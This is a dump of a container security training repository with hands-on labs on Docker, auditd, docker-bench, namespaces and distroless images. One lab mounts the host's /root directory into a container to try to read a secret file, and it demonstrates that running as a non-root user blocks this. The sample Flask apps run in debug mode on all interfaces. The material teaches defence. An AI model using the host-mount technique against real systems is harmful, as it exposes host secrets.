35 | ```bash
36 | docker ps
37 | ```
38 | 
39 | 
40 | ##### Step 5:
41 |  
42 | * To exec into/access the running container, run the following command
43 | 
44 | ```bash
45 | docker exec -it vul_flask bash
46 | 
47 | root@0c8c0c6a5122:/apps#
48 | ```
49 | 
50 | 
51 | ##### Step 6:
52 | 
53 | * To exit from the container, run `exit`
54 | 
55 | ```bash
56 |  exit
57 | ```
58 | 
59 | 
60 | ##### Step 7: 
61 |   
62 | * Stop the running `vul_flask` container.
63 | 
64 | ```bash
65 | docker stop vul_flask
66 | ```
67 | 
68 | 
69 | ##### Step 8:
70 | 
71 | * View all running and stopped containers.
72 | 
73 | ```bash
74 | docker ps -a
75 | ```
76 | 
77 | 
78 | ##### Step 9:
79 | 
80 | * Remove the stopped container.
81 | 
82 | ```bash
83 | docker rm vul_flask
84 | ```
85 | 
86 | 
87 | ##### Step 10:
88 | 
89 | * Remove the `abhaybhargav/vul_flask` docker image from the system.
90 | 
91 |     **Note:** Don't delete image from the VM
92 | 
93 | ```bash
94 | docker rmi abhaybhargav/vul_flask
95 | ```
96 | 


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/helloworld/app.py:
--------------------------------------------------------------------------------
 1 | from flask import Flask
 2 | 
 3 | app = Flask(__name__)
 4 | 
 5 | 
 6 | @app.route('/')
 7 | def hello_world():
 8 |     return 'Hello world from the container!'
 9 | 
10 | 
11 | if __name__ == '__main__':
12 |     app.run(debug=True, host='0.0.0.0')
13 | 


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/helloworld/requirements.txt:
--------------------------------------------------------------------------------
1 | Click==7.0
2 | Flask==1.0.2
3 | itsdangerous==0.24
4 | Jinja2==2.10
5 | MarkupSafe==1.0
6 | Werkzeug==0.14.1
7 | 


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/img/docker-exec.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-exec.png


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/img/docker-images-list.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-images-list.png


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/img/docker-ps-a.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-ps-a.png


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/img/docker-ps.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-ps.png


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/img/docker-pull.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-pull.png


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/img/docker-rm.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-rm.png


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/img/docker-rmi-images.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-rmi-images.png


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/img/docker-run.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-run.png


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/img/docker-stop.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-stop.png


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/img/exit-docker.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/exit-docker.png


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/img/open-app.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/open-app.png


--------------------------------------------------------------------------------
/Container/Docker-Hands-On/img/open_terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/open_terminal.png


--------------------------------------------------------------------------------
/Container/Docker-Monitoring/README.md:
--------------------------------------------------------------------------------
 1 | ## Auditd for Docker monitoring
 2 | 
 3 | 
 4 | ##### Step 1:
 5 | 
 6 | * Install `auditd`
 7 | 
 8 | ```bash
 9 | apt install auditd
10 | ```
11 | 
12 | * Run `service auditd status` to check if `auditd` service is running. If the service is not runninig, run `service auditd start`.
13 | 
14 | 
15 | ![](img/auditd-1.png)
16 | 
17 | 
18 | ##### Step 2:
19 | 
20 | * Create an audit rule to watch for Read, Write, Execute and Attribute changes on `docker-daemon` logging them to a logfile by appending
21 | docker-daemon label at end of each log-entry to make logs easier to query. This can be done by running:
22 |     
23 |     `auditctl -w /usr/bin/docker -p rwxa -k docker-daemon`
24 |     
25 |     * auditctl is for temporary use till system is shutdown. For a more permanent approach, add rule in rules.d/ and run 'augenriles --check'. 
26 |       If there's a difference, run 'augenrules --load' to load the new rules 
27 | 
28 | 
29 | ![](img/auditd-2.png)
30 | 
31 | 
32 | ##### Step 3:
33 | 
34 | * Create, Launch, Run and Stop a few containers for Auditd to log.
35 | 
36 | ![](img/auditd-3.png)
37 | 
38 |    
39 | ##### Step 4:
40 | 
41 | * To search logs based on the label given(`docker-daemon`), run `ausearch -k docker-daemon`.
42 | 
43 | ![](img/auditd-4.png)
44 | 
45 |     
46 | ##### Step 5:
47 | 
48 | * For a count of executable events run on system that day, run `ausearch --start today --raw | aureport -x --summary`
49 | 
50 | ![](img/auditd-5.png)
51 | 
52 | ##### Step 6:
53 | 
54 | * Run `clean-docker` to stop all running containers


--------------------------------------------------------------------------------
/Container/Docker-Monitoring/img/auditd-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Monitoring/img/auditd-1.png


--------------------------------------------------------------------------------
/Container/Docker-Monitoring/img/auditd-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Monitoring/img/auditd-2.png


--------------------------------------------------------------------------------
/Container/Docker-Monitoring/img/auditd-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Monitoring/img/auditd-3.png


--------------------------------------------------------------------------------
/Container/Docker-Monitoring/img/auditd-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Monitoring/img/auditd-4.png


--------------------------------------------------------------------------------
/Container/Docker-Monitoring/img/auditd-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Monitoring/img/auditd-5.png


--------------------------------------------------------------------------------
/Container/Docker-bench/README.md:
--------------------------------------------------------------------------------
 1 | ## Dockerbench
 2 | 
 3 | ###### Docker-bench checks for common best-practices inspired from Docker-CIS-Benchmark when deploying docker containers in production. (https://benchmarks.cisecurity.org/tools2/docker/CIS_Docker_Community_Edition_Benchmark_v1.1.0.pdf) 
 4 | 
 5 | * SSH into your Virtual Lab or open Terminal, if you're on the VM
 6 | 
 7 | * Navigate to Docker-bench Lab Folder
 8 | 
 9 | ```commandline
10 | cd /root/labs/container_training/Container/Docker-bench
11 | ```
12 | 
13 | * Run docker bench command
14 | 
15 | ```commandline
16 | docker run -it --net host --pid host --userns host --cap-add audit_control -e DOCKER_CONTENT_TRUST=$DOCKER_CONTENT_TRUST -v /var/lib:/var/lib -v /var/run/docker.sock:/var/run/docker.sock -v /usr/lib/systemd:/usr/lib/systemd -v /etc:/etc --label docker_bench_security docker/docker-bench-security
17 | ```
18 | 
19 | ![](img/cmd.png)
20 | 
21 | * Run `clean-docker` to stop all the containers


--------------------------------------------------------------------------------
/Container/Docker-bench/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-bench/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/Docker-bench/img/cd-path.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-bench/img/cd-path.png


--------------------------------------------------------------------------------
/Container/Docker-bench/img/cmd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-bench/img/cmd.png


--------------------------------------------------------------------------------
/Container/Limiting-Docker-Capabilities/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Limiting-Docker-Capabilities/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/Network-Namespace/README.md:
--------------------------------------------------------------------------------
 1 | # Network Namespace
 2 | 
 3 | 
 4 | ##### Step 1:
 5 | 
 6 | *  Get the list of network interfaces on the machine.
 7 | 
 8 | ```bash
 9 | ifconfig -a
10 | ```
11 | 
12 | 
13 | ##### Step 2:
14 | 
15 | * Get the iptables info.
16 | 
17 | ```bash
18 | iptables -L
19 | ```
20 | 
21 | 
22 | ##### Step 3:
23 | 
24 | * Get the default network gateways.
25 | 
26 | ```bash
27 | route -n
28 | ```
29 | 
30 | 
31 | ##### Step 4:
32 | 
33 | * Add a Networking Namespace.
34 | 
35 | ```
36 | ip netns add NetNameSpace
37 | ```
38 | 
39 | 
40 | ##### Step 5:
41 | 
42 | * Get the list of Network Namespaces
43 | 
44 | ```bash
45 | ip netns list
46 | ```
47 | 
48 | 
49 | ##### Step 6:
50 | 
51 | * Exec into the Network Namespace and get the list of network interfaces on the 'NetNameSpace' Network Namespace.
52 | 
53 | ```bash
54 | sudo ip netns exec NetNameSpace bash
55 | 
56 | ifconfig -a
57 | ```
58 | 
59 | 
60 | ##### Step 7:
61 | 
62 | * Verify that there is no iptables available, since this is a new networking stack.
63 | 
64 | ```bash
65 | iptables -L
66 | ```
67 | 
68 | * Verify that there is no default gateway, inside a new container.
69 | 
70 | ```bash
71 | route -n
72 | ```
73 | 
74 | 
75 | ##### Step 8:
76 | 
77 | * Exit from the Network Namespace.
78 | 
79 | ```bash
80 | exit 
81 | ```
82 | 
83 | 
84 | ##### Step 9:
85 | 
86 | * Run  `ip netns list` to verify the Network Namespace and delete it
87 | 
88 | ```bash
89 | ip netns list
90 | 
91 | sudo ip netns del NetNameSpace
92 | ```
93 | 


--------------------------------------------------------------------------------
/Container/Network-Namespace/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Network-Namespace/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/Network-Namespace/img/netns-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Network-Namespace/img/netns-1.png


--------------------------------------------------------------------------------
/Container/Network-Namespace/img/netns-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Network-Namespace/img/netns-2.png


--------------------------------------------------------------------------------
/Container/Network-Namespace/img/netns-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Network-Namespace/img/netns-3.png


--------------------------------------------------------------------------------
/Container/Network-Namespace/img/netns-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Network-Namespace/img/netns-4.png


--------------------------------------------------------------------------------
/Container/Network-Namespace/img/netns-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Network-Namespace/img/netns-5.png


--------------------------------------------------------------------------------
/Container/Network-Namespace/img/netns-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Network-Namespace/img/netns-6.png


--------------------------------------------------------------------------------
/Container/Network-Namespace/img/netns-7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Network-Namespace/img/netns-7.png


--------------------------------------------------------------------------------
/Container/Non-Root Container/README.md:
--------------------------------------------------------------------------------
 1 | ## Container Breakout - Non-Root Container
 2 | 
 3 | ### Volume Mounts
 4 | 
 5 | * ssh into the container virtual lab or open Terminal in the VM
 6 | 
 7 |     ```
 8 |     ssh root@<IPAddrGivenToYou>
 9 |     password: <passwordGivenToYou>
10 | 
11 |     ```
12 | 
13 | * Run `whoami` to confirm that you are the `root` user.
14 | 
15 | ```commandline
16 | root@we45:~# whoami
17 | root
18 | root@we45:~#
19 | ```
20 | 
21 | * Validate that there's a secrets file in the root dir with `cat secret.txt`
22 | 
23 | * Run `sudo su we45` to login as a normal user.
24 | 
25 |     ```commandline
26 |     root@we45:~# sudo su we45
27 |     we45@we45:~$
28 |     ```
29 | 
30 | * Check if the user `we45` has access to `docker` by running `docker images` and `docker ps`
31 | 
32 |     ```commandline
33 |     we45@we45:~$ docker images
34 |     we45@we45:~$ docker ps
35 |     ```
36 | 
37 | * Run `cat /root/secret.txt` read the content of `secret.txt` file that was created by `root` user.
38 | 
39 | ```commandline
40 | we45@we45:~$ cat /root/secret.txt
41 | cat: /root/secret.txt: Permission denied
42 | ```
43 | 
44 | * Run `docker run -ti --rm -u 1000 -v /root:/hostFS/ alpine sh` as `we45`(non-root user)
45 | 
46 | 
47 | * Run `cat /hostFS/secret.txt` to view the content of the file.
48 | 
49 | ```commandline
50 | /hostFS/root # cat secret.txt
51 | cat: can't open '/hostFS/secret.txt': Permission denied
52 | ```
53 | 
54 | * Run `exit` to exit from the container.
55 | 
56 | ```commandline
57 | /hostFS/root # exit
58 | we45@we45:~$
59 | ```
60 | 
61 | * Run `clean-docker` to stop all the containers
62 | 
63 | ```commandline
64 | root@we45:~$ clean-docker
65 | ```


--------------------------------------------------------------------------------
/Container/README.md:
--------------------------------------------------------------------------------
 1 | # [Containers](README.md)
 2 | 
 3 | 
 4 | ##### Container Tech Deep-Dive
 5 | 
 6 | * [Union-Mount-File-System](Union-Mount-File-System/README.md)
 7 | 
 8 | * [Network-Namespace](Network-Namespace/README.md)
 9 | 
10 | * [Docker-Hands-On](Docker-Hands-On/README.md)
11 | 
12 | * [Dive - Analysing Docker Images](dive/README.md)
13 | 
14 | 
15 | ##### Container Attacks
16 | 
17 | * [Container Breakout](container-breakout/README.md)
18 | 
19 | * [Docker Daemon Configuration](Docker-Daemon-Configuration/README.md)
20 | 
21 | * [Trojanized Docker Images](Trojanized-Docker-Image/README.md)
22 | 
23 | * [Vulnerable/Outdated Libraries](Vulnerable-Libraries-ShellShock/README.md)
24 | 
25 | 
26 | ##### Container Security Deep-Dive
27 | 
28 | * [Limiting Docker Capabilities](Limiting-Docker-Capabilities/README.md)
29 | 
30 | 
31 | ##### Container Security Mitigations
32 | 
33 | * [Non-Root Container](Non-Root%20Container/README.md)
34 | 
35 | * [Distroless](distroless/README.md)
36 | 
37 | * [SecComp](seccomp/README.md)
38 | 
39 | * [AppArmor](AppArmor/README.md)
40 | 
41 | * [Limiting Docker CAPs](Limiting-Docker-Capabilities/README.md)
42 | 
43 | * [Resource Management](Resource-Management/README.md)
44 | 
45 | ##### Monitor Docker
46 | 
47 | * [OsQuery](OSQuery/README.md)
48 | 
49 | * [Docker Monitoring](Docker-Monitoring/README.md)
50 | 
51 | 
52 | ##### Container Vulnerability Assessment
53 | 
54 | * [Clair](Clair/README.md)
55 | 
56 | * [Docker-bench](Docker-bench/README.md)
57 | 
58 | * [Anchore](Anchore/README.md)
59 | 


--------------------------------------------------------------------------------
/Container/Resource-Management/README.md:
--------------------------------------------------------------------------------
 1 | ## Resource Management
 2 | 
 3 | 
 4 | **Note:**
 5 | ```commandline
 6 | --storage-opt           Storage driver
 7 | --cpus		        Number of CPUs
 8 | -m                      Memory Size 
 9 | 
10 | ```
11 | 
12 | * Run `docker run -it --storage-opt size=10G -m=4M --cpus=".5" ubuntu:latest /bin/bash`
13 | 
14 | 
15 | ##### Step 2:
16 | 
17 | * Run `clean-docker` to stop all containers.  
18 | 
19 |     ```commandline
20 |     (venv)root@we45: clean-docker
21 |     92200af86b18
22 |     ca94dab2d52e
23 |     92200af86b18
24 |     34c4adcf326d
25 |     86cd73d03ef1
26 |     ca94dab2d52e
27 |     "docker rmi" requires at least 1 argument.
28 |     See 'docker rmi --help'.
29 |     
30 |     Usage:  docker rmi [OPTIONS] IMAGE [IMAGE...]
31 |     
32 |     Remove one or more images
33 |     
34 |     ```


--------------------------------------------------------------------------------
/Container/Trojanized-Docker-Image/img/trojan-docker-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Trojanized-Docker-Image/img/trojan-docker-1.png


--------------------------------------------------------------------------------
/Container/Trojanized-Docker-Image/img/trojan-docker-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Trojanized-Docker-Image/img/trojan-docker-2.png


--------------------------------------------------------------------------------
/Container/Trojanized-Docker-Image/img/trojan-docker-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Trojanized-Docker-Image/img/trojan-docker-3.png


--------------------------------------------------------------------------------
/Container/Trojanized-Docker-Image/img/trojan-docker-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Trojanized-Docker-Image/img/trojan-docker-4.png


--------------------------------------------------------------------------------
/Container/Trojanized-Docker-Image/img/trojan-docker-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Trojanized-Docker-Image/img/trojan-docker-5.png


--------------------------------------------------------------------------------
/Container/Trojanized-Docker-Image/img/trojan-docker-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Trojanized-Docker-Image/img/trojan-docker-6.png


--------------------------------------------------------------------------------
/Container/Trusted-Images/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Trusted-Images/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/Trusted-Images/img/docker-hub.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Trusted-Images/img/docker-hub.png


--------------------------------------------------------------------------------
/Container/Union-Mount-File-System/README.md:
--------------------------------------------------------------------------------
 1 | # Union Mount FileSystem
 2 | 
 3 | 
 4 | ##### Step 1: 
 5 | 
 6 | * Install union-fs 
 7 | 
 8 | ```bash
 9 | apt install unionfs-fuse tree
10 | ```
11 | 
12 | * Create Three Folders named `Folder-1`,  `Folder-2` and `mnt`
13 | 
14 | ```bash
15 | mkdir Folder-1 Folder-2 mnt
16 | ```
17 | 
18 | ![](img/ufs-1.png)
19 | 
20 | 
21 | ##### Step 2: 
22 | 
23 | * Create sub-directories and files in `Folder-1` and `Folder-2`
24 | 
25 | ```bash
26 | mkdir -p Folder-1/Dir1 Folder-2/Dir1 Folder-2/Dir2
27 | 
28 | touch Folder-1/File1.txt Folder-1/Dir1/dir1.txt Folder-1/Dir1/one.txt
29 | 
30 | touch Folder-2/Dir1/file2.txt Folder-2/Dir1/two.txt Folder-2/Dir2/dir2_file.txt Folder-2/File2.txt
31 | ```
32 | 
33 | ![](img/ufs-2.png)
34 | 
35 | 
36 | ##### Step 3: 
37 | 
38 | * Check the structure of directories that have been created
39 | 
40 | ```bash
41 | tree .
42 | ```
43 | 
44 | ![](img/ufs-3.png)
45 | 
46 | 
47 | ##### Step 4: 
48 | 
49 | * Run `unionfs-fuse -o dirs=Folder-1:Folder-2  mnt/` . The directories and files in `Folder-1` and `Folder-2` will be mounted on `mnt`
50 | 
51 | ```bash
52 | unionfs-fuse -o dirs=Folder-1:Folder-2  mnt/
53 | ```
54 | 
55 | ![](img/ufs-4.png)
56 | 
57 | 
58 | ##### Step 5: 
59 | 
60 | * Check the structure of `mnt/` 
61 | 
62 | ```bash
63 | tree mnt
64 | ```
65 | 
66 | ![](img/ufs-5.png)
67 | 
68 | 
69 | ##### Step 6: 
70 | 
71 | * To unmount, run `umount -l mnt`
72 | 
73 | ```bash
74 | umount -l mnt
75 | ```
76 | 
77 | ![](img/ufs-6.png)
78 | 
79 | 
80 | ##### Step 7:
81 | 
82 | * Remove the directories sub-directories and files created
83 | 
84 | ```bash
85 | rm -rf Folder-1 Folder-2 mnt
86 | ```
87 | 


--------------------------------------------------------------------------------
/Container/Union-Mount-File-System/img/ufs-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Union-Mount-File-System/img/ufs-1.png


--------------------------------------------------------------------------------
/Container/Union-Mount-File-System/img/ufs-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Union-Mount-File-System/img/ufs-2.png


--------------------------------------------------------------------------------
/Container/Union-Mount-File-System/img/ufs-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Union-Mount-File-System/img/ufs-3.png


--------------------------------------------------------------------------------
/Container/Union-Mount-File-System/img/ufs-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Union-Mount-File-System/img/ufs-4.png


--------------------------------------------------------------------------------
/Container/Union-Mount-File-System/img/ufs-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Union-Mount-File-System/img/ufs-5.png


--------------------------------------------------------------------------------
/Container/Union-Mount-File-System/img/ufs-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Union-Mount-File-System/img/ufs-6.png


--------------------------------------------------------------------------------
/Container/Vulnerable-Libraries-ShellShock/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Vulnerable-Libraries-ShellShock/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/Vulnerable-Libraries-ShellShock/img/defaced.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Vulnerable-Libraries-ShellShock/img/defaced.png


--------------------------------------------------------------------------------
/Container/Vulnerable-Libraries-ShellShock/img/shellshock-browser.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Vulnerable-Libraries-ShellShock/img/shellshock-browser.png


--------------------------------------------------------------------------------
/Container/container-breakout/img/remove_tmux.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/container-breakout/img/remove_tmux.png


--------------------------------------------------------------------------------
/Container/container-breakout/img/split_pane.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/container-breakout/img/split_pane.png


--------------------------------------------------------------------------------
/Container/container-breakout/img/terminate_process.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/container-breakout/img/terminate_process.png


--------------------------------------------------------------------------------
/Container/container-breakout/img/tmux-greenband.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/container-breakout/img/tmux-greenband.png


--------------------------------------------------------------------------------
/Container/distroless/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM python:2.7-slim AS build-env
 2 | ADD . /app
 3 | WORKDIR /app
 4 | RUN pip install --upgrade pip
 5 | RUN pip install -r ./requirements.txt
 6 | 
 7 | FROM gcr.io/distroless/python2.7
 8 | COPY --from=build-env /app /app
 9 | COPY --from=build-env /usr/local/lib/python2.7/site-packages /usr/local/lib/python2.7/site-packages
10 | WORKDIR /app
11 | ENV PYTHONPATH=/usr/local/lib/python2.7/site-packages
12 | CMD ["app.py"]
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/Container/distroless/README.md:
--------------------------------------------------------------------------------
 1 | ## Distroless Docker
 2 | 
 3 | * Run: `cd /root/labs/container_training/Container/distroless`
 4 | * Run: `docker build -t distroless_flask_py .`. Wait for docker to build
 5 | * Run: `cd /root/labs/container_training/Container/distroless/distroful`
 6 | * Run: `docker build -t distroful_flask_py .`. Wait for docker to build
 7 | * Run: `docker run -d -p 5432:5432 --name db arminc/clair-db:2019-01-01`
 8 | * Run: `docker run -d -p 6060:6060 --link db:postgres --name clair arminc/clair-local-scan:v2.0.1`.
 9 | 
10 | **Wait 10 seconds for Clair and DB to start**
11 | 
12 | * Run: `cd /root/labs/container_training/Container/Clair`
13 | * Run: `./clair-scanner --ip <VM_IP> -r clair_report.json distroless_flask_py`
14 | * Run: `./clair-scanner --ip <VM_IP> -r clair_report.json distroful_flask_py`. Observe the results
15 | 
16 | * Run: `clean-docker`


--------------------------------------------------------------------------------
/Container/distroless/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/distroless/__init__.py


--------------------------------------------------------------------------------
/Container/distroless/app.py:
--------------------------------------------------------------------------------
 1 | #!/bin/python
 2 | 
 3 | from flask import Flask
 4 | 
 5 | app = Flask(__name__)
 6 | 
 7 | @app.route('/', methods = ['GET'])
 8 | def main_route():
 9 | 	return "Hello World"
10 | 
11 | if __name__ == '__main__':
12 | 	app.run(debug = True, host = '0.0.0.0')
13 | 


--------------------------------------------------------------------------------
/Container/distroless/distroful/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:14.04
2 | ADD . /app
3 | WORKDIR /app
4 | RUN apt-get update && apt-get install -y python-pip
5 | RUN pip install -r requirements.txt
6 | CMD ["python", "app.py"]
7 | 


--------------------------------------------------------------------------------
/Container/distroless/distroful/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/distroless/distroful/__init__.py


--------------------------------------------------------------------------------
/Container/distroless/distroful/app.py:
--------------------------------------------------------------------------------
 1 | #!/bin/python
 2 | 
 3 | from flask import Flask
 4 | 
 5 | app = Flask(__name__)
 6 | 
 7 | @app.route('/', methods = ['GET'])
 8 | def main_route():
 9 | 	return "Hello World"
10 | 
11 | if __name__ == '__main__':
12 | 	app.run(debug = True, host = '0.0.0.0')
13 | 


--------------------------------------------------------------------------------
/Container/distroless/distroful/requirements.txt:
--------------------------------------------------------------------------------
1 | flask
2 | 


--------------------------------------------------------------------------------
/Container/distroless/requirements.txt:
--------------------------------------------------------------------------------
1 | flask
2 | 


--------------------------------------------------------------------------------
/Container/dive/README.md:
--------------------------------------------------------------------------------
1 | ## Exploring docker image and layer contents with dive
2 | 
3 | * ssh into the host or open terminal on VM
4 | * run `dive abhaybhargav/vul_flask`. Wait for Image Analysis and details


--------------------------------------------------------------------------------
/Container/dive/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/dive/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/extra/container/Anchore/docker-compose.yaml:
--------------------------------------------------------------------------------
 1 | version: '2'
 2 | services:
 3 |   anchore-engine:
 4 |     image: docker.io/anchore/anchore-engine:latest
 5 |     #privileged: true
 6 |     depends_on:
 7 |      - anchore-db
 8 |     ports:
